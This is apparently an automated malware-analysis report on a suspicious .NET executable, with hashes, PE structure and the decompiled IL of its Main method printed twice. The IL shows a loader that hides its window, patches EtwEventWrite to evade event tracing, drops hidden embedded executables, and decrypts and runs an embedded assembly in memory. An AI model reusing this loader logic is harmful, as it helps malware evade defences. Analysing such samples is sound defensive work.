Suspicious
Suspect

e562cfcbd98a86a4f11ef2cde4ec6260

PE Executable
|
MD5: e562cfcbd98a86a4f11ef2cde4ec6260
|
Size: 29.18 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Medium

Hash
Hash Value
MD5
e562cfcbd98a86a4f11ef2cde4ec6260
Sha1
b993b288840f810895395bf26a6d64647f6da28c
Sha256
3ca2df830068d109a89d63e7e151817cad8304ef3b01f0f2a8ac0016d3f4f8f4
Sha384
82e198cd477a4285cca4a79a1ec46ec50f80488ab5444b8cea0f0eae84c10aae2b311e2e67c98d2b80e3119499abc145
Sha512
23b10c1b6f14b751bd5803cfc1f8649c8cd2faf3e333a8af163286e54fad090e2fb32b29a6c32677b87c37f06d4e6261ba861e56f8fe3b729993a0676e380540
SSDeep
384:SBx/SCB8cqtCztBd9Hy2inYs30KyLfzo8uiJhlHNMuHpdkbwu+2DZwndh8hqb8Dl:ixqCBhRD9Hy2if3tyLfHz6birQp
TLSH
D8D2B0127BBE8264D4EE0B3E887342A40139F9D62A63CA5E8DD4805F5DEB7C1CF42790

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
xxxxxxxxxxxxxxxxxxxxxxxxxxxx.exe
Informations
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name

xqfmkpvsxg.tmp

Full Name

xqfmkpvsxg.tmp

EntryPoint

System.Void tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::Main(System.String[])

Scope Name

xqfmkpvsxg.tmp

Scope Type

ModuleDef

Kind

Console

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

xqfmkpvsxg

Assembly Version

0.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

<null>

Total Strings

22

Main Method

System.Void tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::Main(System.String[])

Main IL Instruction Count

201

Main IL

call System.IntPtr tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::GetConsoleWindow() stloc.0 <null> ldloc.0 <null> ldsfld System.Int32 tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::SW_HIDE call System.Boolean tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::ShowWindow(System.IntPtr,System.Int32) pop <null> call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() ldc.i4 16384 callvirt System.Void System.Diagnostics.Process::set_PriorityClass(System.Diagnostics.ProcessPriorityClass) leave.s IL_0026: ldstr "ntdll.dll" pop <null> leave.s IL_0026: ldstr "ntdll.dll" ldstr ntdll.dll call System.IntPtr tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::LoadLibrary(System.String) stloc.1 <null> ldloc.1 <null> ldstr EtwEventWrite call System.IntPtr tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::GetProcAddress(System.IntPtr,System.String) stloc.2 <null> call System.Int32 System.IntPtr::get_Size() ldc.i4.8 <null> beq.s IL_0060: ldc.i4.1 ldc.i4.3 <null> newarr System.Byte stloc.s V_12 ldloc.s V_12 ldc.i4.0 <null> ldc.i4 194 stelem.i1 <null> ldloc.s V_12 ldc.i4.1 <null> ldc.i4.s 20 stelem.i1 <null> ldloc.s V_12 br.s IL_0073: stloc.3 ldc.i4.1 <null> newarr System.Byte stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldc.i4 195 stelem.i1 <null> ldloc.s V_13 stloc.3 <null> ldloc.2 <null> ldloc.3 <null> ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldsfld System.UInt32 tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::PAGE_EXECUTE_READWRITE ldloca.s V_4 call System.Boolean tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::VirtualProtect(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldloc.3 <null> ldc.i4.0 <null> ldloc.2 <null> ldloc.3 <null> ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldloc.2 <null> ldloc.3 <null> ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldloc.s V_4 ldloca.s V_4 call System.Boolean tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::VirtualProtect(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldstr xxxxxxxxxxxxxxxxxxxxxxxxxxxx.exe stloc.s V_5 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() stloc.s V_6 ldloc.s V_6 callvirt System.String[] System.Reflection.Assembly::GetManifestResourceNames() stloc.s V_14 ldc.i4.0 <null> stloc.s V_15 br IL_0172: ldloc.s V_15 ldnull <null> stloc.s V_7 newobj System.Void tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::.ctor() stloc.s V_8 ldloc.s V_8 ldloc.s V_14 ldloc.s V_15 ldelem.ref <null> stfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name ldloc.s V_8 ldfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name ldloc.s V_5 call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_016C: ldloc.s V_15 ldloc.s V_8 ldfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name call System.Boolean System.String::IsNullOrWhiteSpace(System.String) brtrue.s IL_016C: ldloc.s V_15 ldloc.s V_8 ldfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name ldstr .exe callvirt System.Boolean System.String::EndsWith(System.String) brtrue.s IL_0123: ldloc.s V_8 ldloc.s V_8 ldfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name ldstr .bat callvirt System.Boolean System.String::EndsWith(System.String) brfalse.s IL_016C: ldloc.s V_15 ldloc.s V_8 ldfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name ldloc.s V_8 ldfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name call System.Byte[] tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::aulphprveywmulkazqsykyfup(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.s V_8 ldfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_7 brtrue.s IL_015B: ldloc.s V_7 ldloc.s V_8 ldftn System.Void tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::<Main>b__0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) stloc.s V_7 ldloc.s V_7 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) call System.Void System.Threading.Thread::Start() leave.s IL_016C: ldloc.s V_15 pop <null> leave.s IL_016C: ldloc.s V_15 ldloc.s V_15 ldc.i4.1 <null> add <null> stloc.s V_15 ldloc.s V_15 ldloc.s V_14 ldlen <null> conv.i4 <null> blt IL_00C9: ldnull ldloc.s V_5 call System.Byte[] tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::aulphprveywmulkazqsykyfup(System.String) ldstr 96PsrIPxGju00bW6CmhNNxDM4auYx5yXHfPMBG/07+4= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr Uzwj9LpySp+fXEwIdWuZlQ== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::othkdreysisqggmqnreogzcmg(System.Byte[],System.Byte[],System.Byte[]) call System.Byte[] tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::evsdgxsqponfplkzjixzvozzg(System.Byte[]) stloc.s V_9 ldc.i4.0 <null> newarr System.String stloc.s V_10 ldarg.0 <null> ldlen <null> conv.i4 <null> ldc.i4.0 <null> bgt.s IL_01BA: ldarg.0 ldc.i4.0 <null> newarr System.String br.s IL_01D2: stloc.s V_10 ldarg.0 <null> ldc.i4.0 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldc.i4.s 32 stelem.i2 <null> ldloc.s V_16 callvirt System.String[] System.String::Split(System.Char[]) stloc.s V_10 leave.s IL_01D9: ldloc.s V_9 pop <null> leave.s IL_01D9: ldloc.s V_9 ldloc.s V_9 call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() stloc.s V_11 ldloc.s V_11 ldnull <null> ldc.i4.1 <null> newarr System.Object stloc.s V_17 ldloc.s V_17 ldc.i4.0 <null> ldloc.s V_10 stelem.ref <null> ldloc.s V_17 callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_020F: ret pop <null> ldloc.s V_11 ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_020F: ret ret <null>

Module Name

xqfmkpvsxg.tmp

Full Name

xqfmkpvsxg.tmp

EntryPoint

System.Void tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::Main(System.String[])

Scope Name

xqfmkpvsxg.tmp

Scope Type

ModuleDef

Kind

Console

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

xqfmkpvsxg

Assembly Version

0.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

<null>

Total Strings

22

Main Method

System.Void tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::Main(System.String[])

Main IL Instruction Count

201

Main IL

call System.IntPtr tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::GetConsoleWindow() stloc.0 <null> ldloc.0 <null> ldsfld System.Int32 tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::SW_HIDE call System.Boolean tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::ShowWindow(System.IntPtr,System.Int32) pop <null> call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() ldc.i4 16384 callvirt System.Void System.Diagnostics.Process::set_PriorityClass(System.Diagnostics.ProcessPriorityClass) leave.s IL_0026: ldstr "ntdll.dll" pop <null> leave.s IL_0026: ldstr "ntdll.dll" ldstr ntdll.dll call System.IntPtr tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::LoadLibrary(System.String) stloc.1 <null> ldloc.1 <null> ldstr EtwEventWrite call System.IntPtr tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::GetProcAddress(System.IntPtr,System.String) stloc.2 <null> call System.Int32 System.IntPtr::get_Size() ldc.i4.8 <null> beq.s IL_0060: ldc.i4.1 ldc.i4.3 <null> newarr System.Byte stloc.s V_12 ldloc.s V_12 ldc.i4.0 <null> ldc.i4 194 stelem.i1 <null> ldloc.s V_12 ldc.i4.1 <null> ldc.i4.s 20 stelem.i1 <null> ldloc.s V_12 br.s IL_0073: stloc.3 ldc.i4.1 <null> newarr System.Byte stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldc.i4 195 stelem.i1 <null> ldloc.s V_13 stloc.3 <null> ldloc.2 <null> ldloc.3 <null> ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldsfld System.UInt32 tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::PAGE_EXECUTE_READWRITE ldloca.s V_4 call System.Boolean tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::VirtualProtect(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldloc.3 <null> ldc.i4.0 <null> ldloc.2 <null> ldloc.3 <null> ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldloc.2 <null> ldloc.3 <null> ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldloc.s V_4 ldloca.s V_4 call System.Boolean tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::VirtualProtect(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldstr xxxxxxxxxxxxxxxxxxxxxxxxxxxx.exe stloc.s V_5 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() stloc.s V_6 ldloc.s V_6 callvirt System.String[] System.Reflection.Assembly::GetManifestResourceNames() stloc.s V_14 ldc.i4.0 <null> stloc.s V_15 br IL_0172: ldloc.s V_15 ldnull <null> stloc.s V_7 newobj System.Void tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::.ctor() stloc.s V_8 ldloc.s V_8 ldloc.s V_14 ldloc.s V_15 ldelem.ref <null> stfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name ldloc.s V_8 ldfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name ldloc.s V_5 call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_016C: ldloc.s V_15 ldloc.s V_8 ldfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name call System.Boolean System.String::IsNullOrWhiteSpace(System.String) brtrue.s IL_016C: ldloc.s V_15 ldloc.s V_8 ldfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name ldstr .exe callvirt System.Boolean System.String::EndsWith(System.String) brtrue.s IL_0123: ldloc.s V_8 ldloc.s V_8 ldfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name ldstr .bat callvirt System.Boolean System.String::EndsWith(System.String) brfalse.s IL_016C: ldloc.s V_15 ldloc.s V_8 ldfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name ldloc.s V_8 ldfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name call System.Byte[] tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::aulphprveywmulkazqsykyfup(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.s V_8 ldfld System.String tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::name ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldloc.s V_7 brtrue.s IL_015B: ldloc.s V_7 ldloc.s V_8 ldftn System.Void tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo/<>c__DisplayClass2::<Main>b__0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) stloc.s V_7 ldloc.s V_7 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) call System.Void System.Threading.Thread::Start() leave.s IL_016C: ldloc.s V_15 pop <null> leave.s IL_016C: ldloc.s V_15 ldloc.s V_15 ldc.i4.1 <null> add <null> stloc.s V_15 ldloc.s V_15 ldloc.s V_14 ldlen <null> conv.i4 <null> blt IL_00C9: ldnull ldloc.s V_5 call System.Byte[] tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::aulphprveywmulkazqsykyfup(System.String) ldstr 96PsrIPxGju00bW6CmhNNxDM4auYx5yXHfPMBG/07+4= call System.Byte[] System.Convert::FromBase64String(System.String) ldstr Uzwj9LpySp+fXEwIdWuZlQ== call System.Byte[] System.Convert::FromBase64String(System.String) call System.Byte[] tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::othkdreysisqggmqnreogzcmg(System.Byte[],System.Byte[],System.Byte[]) call System.Byte[] tiynrbkkjtdnfhspzifszbeav.jiudchnzocdiagsluglwolqeo::evsdgxsqponfplkzjixzvozzg(System.Byte[]) stloc.s V_9 ldc.i4.0 <null> newarr System.String stloc.s V_10 ldarg.0 <null> ldlen <null> conv.i4 <null> ldc.i4.0 <null> bgt.s IL_01BA: ldarg.0 ldc.i4.0 <null> newarr System.String br.s IL_01D2: stloc.s V_10 ldarg.0 <null> ldc.i4.0 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldc.i4.s 32 stelem.i2 <null> ldloc.s V_16 callvirt System.String[] System.String::Split(System.Char[]) stloc.s V_10 leave.s IL_01D9: ldloc.s V_9 pop <null> leave.s IL_01D9: ldloc.s V_9 ldloc.s V_9 call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() stloc.s V_11 ldloc.s V_11 ldnull <null> ldc.i4.1 <null> newarr System.Object stloc.s V_17 ldloc.s V_17 ldc.i4.0 <null> ldloc.s V_10 stelem.ref <null> ldloc.s V_17 callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_020F: ret pop <null> ldloc.s V_11 ldnull <null> ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_020F: ret ret <null>

e562cfcbd98a86a4f11ef2cde4ec6260 (29.18 KB)
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
xxxxxxxxxxxxxxxxxxxxxxxxxxxx.exe
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙